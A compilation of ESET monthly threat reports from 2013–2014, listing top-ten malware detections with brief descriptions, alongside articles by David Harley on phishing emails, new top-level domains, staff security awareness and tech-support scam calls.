Monthly Threat Report: March 2014

Top_10_ELG_marz_14_1200x627eng

The Top Ten Threats

1. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 2.88%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used. The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. LNK/Agent.AK

Previous Ranking: 2
Percentage Detected: 1.87%

LNK/Agent.AK is a link that concatenates commands to run the real or legitimate application/folder and, additionaly runs the threat in the background. It could become the new version of the autorun.inf threat. This vulnerability was known as Stuxnet was discovered, as it was one of four that threat vulnerabilities executed.

3. Win32/Sality

Previous Ranking: 3
Percentage Detected: 1.66%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. INF/Autorun

Previous Ranking: 4
Percentage Detected: 1.57%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case.

5. Win32/Qhost

Previous Ranking: 5
Percentage Detected: 1.51%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

6. HTML/ScrInject

Previous Ranking: 6
Percentage Detected: 1.36%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

7. Win32/Conficker

Previous Ranking: 8
Percentage Detected: 1.28%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This treat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145.

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 7
Percentage Detected: 1.27%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.
9. Win32/Dorkbot

Previous Ranking: 9
Percentage Detected: 1.07%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX. The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine. This kind of worm can be controlled remotely.

10. JS/FBook

Previous Ranking: n/a
Percentage Detected: 0.95%

JS/FBook is a trojan used for delivery of unsolicited advertisements. The trojan does not create any copies of itself, and the program code is usually embedded in HTML pages.

Monthly Threat Report: February 2014

Top_10_ELG_ene_14_1200x627br

The Top Ten Threats

1. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 2.9%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used.  The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. LNK/Agent.AK

Previous Ranking: 5
Percentage Detected: 1.86%

LNK/Agent.AK is a link that concatenates commands to run the real or legitimate application/folder and, additionaly runs the threat in the background. It could become the new version of the autorun.inf threat. This vulnerability was known as Stuxnet was discovered, as it was one of four that threat vulnerabilities executed.

3. Win32/Sality

Previous Ranking: 2
Percentage Detected: 1.67%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. INF/Autorun

Previous Ranking: 4
Percentage Detected: 1.57%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case.

5. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.55%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

6. HTML/ScrInject

Previous Ranking: 3
Percentage Detected: 1.54%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

7. Win32/Ramnit

Previous Ranking: 6
Percentage Detected: 1.27%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

8. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.26%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This treat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145.

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

9. Win32/Dorkbot

Previous Ranking: 10
Percentage Detected: 1.1%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.  The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

10. Win32/TrojanDownloader.Waski

Previous Ranking: n/a
Percentage Detected: 1.02%

Win32/TrojanDownloader.Waski is a trojan which tries to download other malware from the Internet. It contains a list of two URLs and tries to download a file from the addresses. The HTTP protocol is used. The file is stored in the location %temp%\­miy.exe, and is then executed.

Phishing Scam Update

by David Harley, ESET North America
by Urban Schrott, ESET Ireland

It may seem at the moment that I don’t write about anything apart from phishing scams and tech support scams. That’s not actually the case, but scammers don’t seem to take holidays, and a couple of things have come along that I couldn’t resist mentioning.

The first has the subject “RBS – Working to protect you and your card.” It appears to come from CreditCardOnlineServices(at)cards.rbs.co.uk.

RBS Credit Card Account Holder:

Your RBS Credit Card is designed to help keep you safe
Receive alerts when we spot a suspicious transaction
Sometimes we spot what looks like a fraudulent transaction on your credit card – so to make sure, we’ll call you and check. Better still, why not join our free fraud text alert service?
It’s just another way we’re working to keep your card and your money safe.
To sign-up for this service, simply visit our
fraud text alert website.

Why is this interesting? Well, there are a couple of things here that indicate a scam.

  • The giveaway absence of personalization – if you’re one of a financial institution’s customers, there’s no excuse for not addressing you by name and proving that they know something about you that a scammer wouldn’t.
  • We’ve neutralized the link to the so-called text alert website, but it led to a site that had nothing to do with RBS or even the UK – it appeared to have a Swedish domain name – and actually contained other pages masquerading as other banks.

Apart from that – and the fact that I don’t have an RBS card! – there isn’t much here to indicate to the average user that it’s a scam. The English isn’t ‘foreign’ and does a good job of capturing the tone of a chatty advertising mailshot.

And here’s another one from ‘Lloyds’. Bizarrely, though at first sight the sender appears to be Lloyds Personal Banking, the actual mail address is toilet@ebay.com. It pays to check the mailbox address as well as the display name (Lloyds Personal Banking in this case), even though there’s no guarantee that the address used is a genuine address.

Resolving An Issue With Your Account
Dear Valued Customer
We need your help resolving an issue with your account. To give us to to work together on this, we’ve temporarily limited what you can do with your account until the issue is resolved.
How you can help
It’s usually pretty easy to take care of things like this. Most of the time, we just need a little more information about your account or latest transactions.
To help us with this and to find out what you can and can’t do with your account until the issue is resolved.click on the ink below to resolve issue

Log in here to resolve issue.

Sincerely,
Lloyds Bank

 

This one also lacks personalization and also links to a URL with no connection to Lloyds or the UK. The proofreader was a bit slack, too – “click on the ink below…” – and the English is a little more – well, unEnglish… Still, it’s noticeable that the scammer was aiming for the same chattier, more idiomatic style, and there’s some novelty to that.

Meanwhile, my colleague Urban Schrott has been writing for ESET Ireland about scams that have crossed his radar. While there’s no disputing the lengths Apple goes to defend its customers from security threats, it’s not possible for an operating system provider or security vendor to provide absolute protection for the user of any platform or security software from his own lack of caution. As Urban points out, if users are overconfident of the absolute security of their computing environment, “…that confidence can work against them when it comes to social engineering, particularly phishing, as they tend to trust “official” looking websites more [than they should] and cybercriminals know and abuse this to the maximum.

As an example, he describes how a very realistic looking phishing email is being received by Irish users, using the usual Apple visual clues and leading to a faked ITunes Connect login site at an address is that several security vendors have noted is associated with malware distribution, and which harvests users’ iTunes login details. He notes that it “still lets you in if you enter any made-up nonsense though.”

The prospective victim (addressed generically, of course, as ‘Dear Apple Customer’, is told that “in order to get back into your apple account, you’ll need to confirm your account. It’s easy: Click the link below to open a secure browser window. Confirm that you’re the owner of the account and then follow the instructions. .“

itunesfake

While the mail looks fairly realistic (with an Apple logo and so on) there are one or two details that you might have spotted. The failure to capitalize Apple; a couple of proofing errors (the unfortunate space between ‘account’ and the following period character, two period characters separated by a space character at the end of the paragraph; and the capitalized Click after a colon, which is common US usage, but not common in the UK or Ireland.

The fake iTunes Connect login is even more US-centric. Once “logged in”, the page asks you to “confirm” many of your personal details, including your credit card number and security code, your password and sort code, but also your Social Security number. Are there that many Americans in Ireland, I wonder?

Monthly Threat Report: October 2013

Top_10_ELG_oct_13_eng

The Top Ten Threats

1. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 3.9%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used.  The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. INF/Autorun

Previous Ranking: 2
Percentage Detected: 2.1%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case.

3. Win32/Sality

Previous Ranking: 3
Percentage Detected: 2.05%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. HTML/Iframe

Previous Ranking: 4
Percentage Detected: 1.9%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

5. HTML/ScrInject

Previous Ranking: 5
Percentage Detected: 1.78%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

6. Win32/Dorkbot

Previous Ranking: 6
Percentage Detected: 1.62%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

7. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.61%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 8
Percentage Detected: 1.45%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

9. Win32/TrojanDownloader.Small.AAB

Previous Ranking: n/a
Percentage Detected: 1.34 %

Win32/TrojanDownloader.Small.AAB is a trojan which tries to download other malware from the Internet. When executed, it copies itself into the %temp%\­hcbnaf.exe location. The trojan contains a URL address, and it tries to download a file from the address.

10. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.09 %

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

Monthly Threat Report: September 2013

Top_10_ELG_sept_13_eng

1. Win32/Bundpil

Previous Ranking: 2
Percentage Detected: 3.69%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used.  The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

. INF/Autorun

Previous Ranking: 5
Percentage Detected: 2.08%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case.

3. Win32/Sality

Previous Ranking: 4
Percentage Detected: 2.05%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. HTML/Iframe

Previous Ranking: 1
Percentage Detected: 1.78%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

5. HTML/ScrInject

Previous Ranking: 3
Percentage Detected: 1.73%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

6. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.59%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

7. Win32/Conficker

Previous Ranking: 6
Percentage Detected: 1.58%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 8
Percentage Detected: 1.43%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

9. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.23 %

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

10. Win32/Virut

Previous Ranking: 10
Percentage Detected: 0.98%

Win32/Virut is a polymorphic file infector. It affects files with EXE and SCR extensions, by adding the threat itself to the last section of the files source code. Aditionally, it searches for htm, php and asp files adding to them a malicious iframe. The virus connects to the IRC network. It can be controlled remotely.

 

TLDs, Phishing, Business Security and Education

David Harley CITP FBCS CISSP ESET Senior Research Fellow

Recently we were asked about the security implications of the new wave of professional Top Level Domains (TLDs), notably .bank. This isn’t an issue I’ve really given much thought to: I only work seven days a week. But it seems to me that the central issue with gTLDs (generic TLDs) like .bank as opposed to specific brand TLDs like .barclays is how much trust you can place in the bona fides of a domain.

Some thought has been put into reducing the risk of trademark infringement and avoiding cybersquatting in terms of brand TLDs, and that has in indirect benefit to the user because it makes phishing somewhat less likely. However, once the domain is approved and launched, how safe it is depends on the good intent and security-awareness of the domain holder.

Very heavy use has been made in recent years of subdomains under TLDs such as .co.cc and .tk to host malicious URLs, as well as TLDs whose core business is to provide subdomains (or sub-subdomains) under their own *.com domain. There’s potential here for an expansion of such malicious activity, and I for one am not going to rush to click on any links in any email I receive from {mybank}.bank, let alone such gifts to typosquatting as .comm.

There’s recently been a revitalized discussion on Twitter about the much-heralded death of anti-virus. I’ve been hearing this since about 1994, so it must be going to happen soon. Well, Larry Bridwell and I will be discussing the demise of the industry that pays my bills at the AVAR conference in December, so I won’t devote a lot of space to that issue now, but one of the interesting facets of that Twitter threat came out of a blog by Blaze in which he suggests that there is a blame attribution model where various stakeholders – AV vendors, other security vendors, Microsoft, and other application vendors – attribute some blame to one or more of the other players, but all blame the end user.

I agree, that’s kind of close to a ‘blame the victim’ culture like the one that old-school virus writers and new age cybercriminals are both apt to subscribe to. Kurt Wismer points out though that “at the end of the day, no one is expecting the attackers to collectively vanish, so improving things is going to require changes on the part of other players as well, including the users.” Improving user awareness across the board – particularly for home users – is a bigger job than I can do justice to in a short article, but how about in the business world? As it happens, that’s something else we were asked about recently…

Every kind of business generates and store data that is potentially of interest to cyber criminals, and even the smallest business should assess how valuable or sensitive its data really is, by performing a formal security audit if appropriate. Businesses of any size are also subject to national data protection laws and need to be aware of these and of the penalties for non-compliance.

As part of their risk analysis, businesses (irrespective of their size) need to consider the impact of a security breach on the business, thinking about who or what would be affected and whether the business could continue to trade if a breach was successful. Once it has a clear view of the risks it can then decide how to communicate network security policies to its staff.

The first step is to make sure staff are aware of the risks from cyber-criminals. Although cybercrooks are sometimes very cunning and sophisticated, their impact can be drastically reduced by some simple preventative measures and education. Good user education is a filter, not a flood: you can’t educate effectively by hitting people with ‘everything they need to know about security’ in one massive hit: it’s an ongoing process that focuses on essentials, on teaching the user to extrapolate from one example scenario to others, and reinforcement of core messages over the whole period where the staff member works for the company.

It’s essential to create a culture of security awareness where all staff, regardless of level and role, take it for granted that they are part of the solution.

For cyber security efforts to be as successful as should be, everyone needs to know and understand what the organisation’s cyber security policies are, how to comply with them through proper use of controls, why compliance is important and the possible consequences of failure to comply (to the company and to the individual).

The goal should be the creation of a “security-aware workforce”: not a workforce comprised entirely of security gurus, but one where employees are empowered to report risky practices to management. Staff training sessions should make employees aware of such things as email safety, password usage, safe mobile use and the importance of data protection, and an Acceptable Use Policy (AUP) for all staff, including approved web and social media usage. Policies, controls and security education should also take into account data-sharing relationships with partners, vendors and clients. An authoritarian approach to security enforcement with draconian penalties won’t suit every environment, but employers should spell out that a breach of security can be very bad news for business and threaten its continued operation. If there are specific disciplinary consequences, they need to be clearly documented so that staff are in no doubt as to their existence.

Education is not a one-time, one-shot process. People forget what they don’t use, and have to be reminded and even re-trained. People are better at complying with policies when they understand the rationale behind them. Even assuming that they intend to comply, they’re likelier to remember to comply if they understand why they should do X and shouldn’t do Y.

Since education is an on-going process, HR can play an important role in ensuring that everyone receives suitable and consistent training in the form most appropriate to their role. IT and HR need to liaise to ensure that people have appropriate training and system privilege levels as they enter the organisation and change roles, and to ensure that they don’t retain inappropriate access once they leave.

Monthly Threat Report: August 2013

Top_10_ELG_agosto_13_eng

The Top Ten Threats

1. HTML/Iframe

Previous Ranking: 5
Percentage Detected: 4.26%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

2. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 3.45%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used.  The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

3. HTML/ScrInject

Previous Ranking: 2
Percentage Detected: 2.59%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

4. Win32/Sality

Previous Ranking: 4
Percentage Detected: 2.08%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

5. INF/Autorun

Previous Ranking: 3
Percentage Detected: 2.06%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case.

6. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.62%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

7. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.52%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

8. Win32/Ramnit

Previous Ranking: 9
Percentage Detected: 1.35%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

9. Win32/Qhost

Previous Ranking: 10
Percentage Detected: 1.15 %

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

10. Win32/Virut

Previous Ranking: n/a
Percentage Detected: 0.95%

Win32/Virut is a polymorphic file infector. It affects files with EXE and SCR extensions, by adding the threat itself to the last section of the files source code. Aditionally, it searches for htm, php and asp files adding to them a malicious iframe. The virus connects to the IRC network. It can be controlled remotely.

 

PC Support Scams: still keeping us amused

David Harley CITP FBCS CISSP ESET Senior Research Fellow

A version of this article previously appeared on the Chainmailcheck hoax/scam blog.

It’s been a while since I picked up the phone and found myself talking to a support scammer. That may be in part because I’m less likely to pick up a call that is flagged as ‘International’, ‘Withheld’ or ‘Unknown number’. But when I do pick up a suspiciously anonymous call, it’s usually a different kind of scam, PPI reclaim voice spam (mostly automated), and so on.

I haven’t missed it a bit. So when I got a phone call from someone with a hard-to-parse Asiatic accent came on the line and started a familiar spiel, it was never likely that I was going to play along for any length of time. Life is too short.

The spiel, by the way, opens something like this, in my experience. Your mileage may vary.

“Am I speaking [or 'Can I speak to'] to Mr Jones?”

In this case, as in most of the support scams I get, the fact that I wasn’t the person the scammer was expecting made no difference at all, though he did apologize profusely for getting my name wrong. Sometimes, though, the scammer will go to some length to tell you who you are and where you live, no doubt so that you will believe them when they tell you that they know that your PC is having problems (or causing them for someone else). However, if they manage to get your details right, that only really means that they’ve managed to check them in a directory.

Actually, the name they usually use when they call me isn’t Jones, and I sometimes get calls that appear to be legitimate asking for the same person, so I guess there is a wrong entry on a directory or customer lead list somewhere. My rule of thumb is that if the caller apologizes for bothering me and rings off, it’s probably a legitimate call that neither of us have any interest in. Though if the intended call was a sales call, that might raise a question as to whether they’d checked that the number was registered with the UK’s Telephone Preference Service, a “do not call” list. Still, if they thought they were dealing with a customer, it’s a grey area, at worst.

